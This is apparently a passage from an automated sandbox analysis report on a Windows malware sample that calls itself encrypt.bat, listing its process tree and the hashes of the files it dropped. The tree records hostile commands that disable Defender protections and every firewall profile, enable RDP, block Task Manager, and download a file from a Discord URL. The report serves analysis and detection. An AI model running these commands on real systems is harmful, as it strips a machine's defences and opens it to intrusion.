                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1896
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                      8⤵
                                                                      • Blocklisted process makes network request
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3496
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                      8⤵
                                                                      • Command and Scripting Interpreter: PowerShell
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1200
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                        9⤵
                                                                          PID:3480
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                            10⤵
                                                                              PID:1936
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                              10⤵
                                                                                PID:4056
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                10⤵
                                                                                  PID:4348
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                  10⤵
                                                                                    PID:1992
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4824
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1624
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5756
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5460
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5896
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh firewall set opmode disable
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:3748
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh firewall set opmode mode=DISABLE
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:3280
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set currentprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:6044
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set domainprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:2224
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set privateprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:1064
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set publicprofile state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:840
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    netsh advfirewall set allprofiles state off
                                                                                    10⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:396
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5664
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5696
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:1936
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5768
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4816
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2492
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"
                                                                                    10⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4304
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"
                                                                                    10⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:5108
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"
                                                                                      11⤵
                                                                                        PID:5068
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
                                                                                          12⤵
                                                                                            PID:2852
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
                                                                                            12⤵
                                                                                              PID:936
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
                                                                                              12⤵
                                                                                                PID:5584
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
                                                                                                12⤵
                                                                                                  PID:840
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1020
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:1768
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5240
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableEmailProtection $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2864
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3360
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall set opmode disable
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:6048
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh firewall set opmode mode=DISABLE
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:3884
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set currentprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:5136
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set domainprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:2912
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set privateprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:5756
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set publicprofile state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:3484
                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                  netsh advfirewall set allprofiles state off
                                                                                                  12⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:1848
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:2480
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                  12⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5912
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                              10⤵
                                                                                              • Sets desktop wallpaper using registry
                                                                                              PID:5368
                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                              RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                              10⤵
                                                                                                PID:1804
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                            8⤵
                                                                                            • Sets desktop wallpaper using registry
                                                                                            PID:1844
                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                            8⤵
                                                                                              PID:2376
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                          6⤵
                                                                                          • Sets desktop wallpaper using registry
                                                                                          PID:3580
                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                          RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                          6⤵
                                                                                            PID:1012
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f
                                                                                        4⤵
                                                                                        • Sets desktop wallpaper using registry
                                                                                        PID:4408
                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                                        4⤵
                                                                                          PID:756
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:3112
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:5100

                                                                                      Network

                                                                                            MITRE ATT&CK Enterprise v15

                                                                                            Downloads

                                                                                            • C:\Encrypt\encrypt.bat

                                                                                              Filesize

                                                                                              2KB

                                                                                              MD5

                                                                                              7a2773f461b2f4672ceb202de1104e08

                                                                                              SHA1

                                                                                              cbcab3b011eddb0b5af6dcfee171511efc2bb9c3

                                                                                              SHA256

                                                                                              522df7962a78dcec153baa5039c7cc119a0893fa247483fa0cddaf600ef9f695

                                                                                              SHA512

                                                                                              df35de150f08cb8bba1910a6be86d7945cd44850b6e9e9ffd420643d1ad18b172325f9114aa0982ec9e148ba62b55b4d8c69236156c562a5a1c024fba0c3983b

                                                                                            • C:\Encrypt\encrypt.html

                                                                                              Filesize

                                                                                              1KB

                                                                                              MD5

                                                                                              60722a327960e4b4f5d967101a72ed06

                                                                                              SHA1

                                                                                              04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e

                                                                                              SHA256

                                                                                              3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd

                                                                                              SHA512

                                                                                              98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                              Filesize

                                                                                              2KB

                                                                                              MD5

                                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                                              SHA1

                                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                              SHA256

                                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                              SHA512

                                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              439b5e04ca18c7fb02cf406e6eb24167

                                                                                              SHA1

                                                                                              e0c5bb6216903934726e3570b7d63295b9d28987

                                                                                              SHA256

                                                                                              247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

                                                                                              SHA512

                                                                                              d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                              Filesize

                                                                                              152B

                                                                                              MD5

                                                                                              a8e767fd33edd97d306efb6905f93252

                                                                                              SHA1

                                                                                              a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

                                                                                              SHA256

                                                                                              c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

                                                                                              SHA512

                                                                                              07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\09e70805-8641-4e88-83bf-28ff3a9cf2c1.tmp

                                                                                              Filesize

                                                                                              6KB

                                                                                              MD5

                                                                                              8d262936f025e6e0e43279e26a74f814

                                                                                              SHA1

                                                                                              67a850a2fbe1d33d4abdc06341ea46677458a686

                                                                                              SHA256

                                                                                              a887ab7dc1193f0fc2f3811020bdf86c2db432bb350c506f281ca4a957f431b8

                                                                                              SHA512

                                                                                              1efb8958e92e8a87ae51387a2746eaec512329b589e8354a8b9175ecc9f9f4274eb4d5ebba672cd1a5617fdb90644c906c1a02e165651f1300a82afd37a3c960

                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                              Filesize

  6KB
  MD5: 44c26cbaf88913355d7abf2a66730ff7
  SHA1: dc0cb90a3fe0690dc705f42233e1830ce65aba65
  SHA256: fdc26ba3a857cdbc139bed687128f1392a58833abf1fee87f1ed9a1419212543
  SHA512: be282aa6f8830e8037d15969424e51c69d615c0ca02e68108d67b505c32709c38faec1ac2e2398bbab0c2392fa632b58a7173e92adf78793937a3ef13db4f531

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 5KB
  MD5: 5903dce331aa080fc070d7a01cb096a0
  SHA1: bf4ab928de5cdd5709b8e878003063dfa2f7d664
  SHA256: 237f87410533eb1026c04fd11ccce10ff4eb46df187f654f8845b13c60722cd0
  SHA512: ad0ef4b4cb74e7a70f7dc32545b86d513c2f16f1b6f759d3335937929dc7dbc732dc274a6e2e7d93bed5a3e363cb10af1fb7badedfecd4c63a7a287e9a1f90e7

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
  Filesize: 6KB
  MD5: 1fafccc6562a08ffbb2ed854da54fd32
  SHA1: f364282248ed53ebed1823b0eb9e0cafb0915683
  SHA256: 411be2ff7862c47b500306798def07d106a23ef68637064e6a9f192c4f8ebc7f
  SHA512: af31cf64e6ecd23ea31946ab8ada4d382690b64c396f408ae59ed70dc97726ed01cc769cd3ef39db48bcb7d4fd173d1e35321206f69a3939ffd56ef6ef0634ea

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
  Filesize: 16B
  MD5: 6752a1d65b201c13b62ea44016eb221f
  SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
  SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
  SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 35a59a7f006e394c1f7d3cff3ba28e15
  SHA1: 6fcc60038f86ede4c4bc75b35bb10e3d98295e69
  SHA256: 5042f38ff3798f608d7df292d16b9890116f60271332f338dabac56020ce8f2e
  SHA512: 27a11d0430a03174c37df04c37389889982fea0ffeaf2070cac4c8a5b1e6bcdd7dbb13c2e4cd2d7fb2021be8676768abc14d35e8d4b20f70ccf829b4e0637528

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 580197daef293a1ee72e0d5e7f7c5183
  SHA1: 2dc52c3c785cad4023ebca6ea050560933b80e6d
  SHA256: 17470106498c1d2be3a53d9313a0eed6e16ab11b728140edc3c2439970dc848a
  SHA512: ffe174ac9ce0ccf3877f07551dfbd7d8f77dc184e927ab48edf189b3b1571f1f1b52f9c6acb44c07ec58669fdee109e7d76f78c86702f0ca67c3e0b1c59c677e

• C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
  Filesize: 11KB
  MD5: 49baae818d3148742759e52ed3f4ac47
  SHA1: 63b94819cf5409f862852a3a084fb274a3af7f93
  SHA256: fceccb2023c8aaae9b80282bb9c7d95078b40aa727e3bc2e3b93533c5e4667dc
  SHA512: b7d0db094fc8939e613e55533b5f7fc2c7d6679a1f3251d3704fd1317824a2d2527f6a895f925ca372458886715a5e48c5fe19ca16befe9eacfea8efdc2a6949

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 6d42b6da621e8df5674e26b799c8e2aa
  SHA1: ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
  SHA256: 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
  SHA512: 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: eb1ad317bd25b55b2bbdce8a28a74a94
  SHA1: 98a3978be4d10d62e7411946474579ee5bdc5ea6
  SHA256: 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
  SHA512: d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 3072fa0040b347c3941144486bf30c6f
  SHA1: e6dc84a5bd882198583653592f17af1bf8cbfc68
  SHA256: da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
  SHA512: 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: ef647504cf229a16d02de14a16241b90
  SHA1: 81480caca469857eb93c75d494828b81e124fda0
  SHA256: 47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710
  SHA512: a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: ba169f4dcbbf147fe78ef0061a95e83b
  SHA1: 92a571a6eef49fff666e0f62a3545bcd1cdcda67
  SHA256: 5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
  SHA512: 8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: d8cb3e9459807e35f02130fad3f9860d
  SHA1: 5af7f32cb8a30e850892b15e9164030a041f4bd6
  SHA256: 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
  SHA512: 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 9bc110200117a3752313ca2acaf8a9e1
  SHA1: fda6b7da2e7b0175b391475ca78d1b4cf2147cd3
  SHA256: c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb
  SHA512: 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 15dde0683cd1ca19785d7262f554ba93
  SHA1: d039c577e438546d10ac64837b05da480d06bf69
  SHA256: d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
  SHA512: 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 60945d1a2e48da37d4ce8d9c56b6845a
  SHA1: 83e80a6acbeb44b68b0da00b139471f428a9d6c1
  SHA256: 314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3
  SHA512: 5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 10890cda4b6eab618e926c4118ab0647
  SHA1: 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
  SHA256: 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
  SHA512: a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 0256bd284691ed0fc502ef3c8a7e58dc
  SHA1: dcdf69dc8ca8bf068f65d20ef1563bbe283e2413
  SHA256: e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf
  SHA512: c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 8f5c85fab64f90c57d834907d69907a5
  SHA1: d0bb6e6a0c862d78a832120431c80052cd872d6d
  SHA256: 925ead1306dc5b455fee2c38d89b3015487bcd6cb5268d5f3cf2b8ba5e8a5c07
  SHA512: b984bb6024ecafd440b7feb83720333c0e87a0b014143a05fd5d30324e92953448ac70e9815bc96b2a45bd2a8c96b79f87532040e2b69eab1039053df8df8c2f

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5: d9fbd004c6ef009dc296538cdd0062a6
  SHA1: b805fe342d545a92c2a92f9f0867a104fd78c275
  SHA256: 053ce5ffa45ec806bddb8865aabbf20315a598cb53022eeeab1e7ffc53b5c6ac
  SHA512: 78457addba78fb3c99015a776fd715fec2e4e4e3fe6df8b534490d40af3666536b3eb0cf59768f6ea70e3e5a511edaf6c8a8cc295f6f59c1b7ee0917700c3cf0

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 96ff1ee586a153b4e7ce8661cabc0442
  SHA1: 140d4ff1840cb40601489f3826954386af612136
  SHA256: 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
  SHA512: 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: 83685d101174171875b4a603a6c2a35c
  SHA1: 37be24f7c4525e17fa18dbd004186be3a9209017
  SHA256: 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
  SHA512: 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5: e60eb305a7b2d9907488068b7065abd3
  SHA1: 1643dd7f915ac50c75bc01c53d68c5dafb9ce28d
  SHA256: ad07460e061642c0dd4e7dfa7b821aacce873e290389e72f708e9f3504f9d135
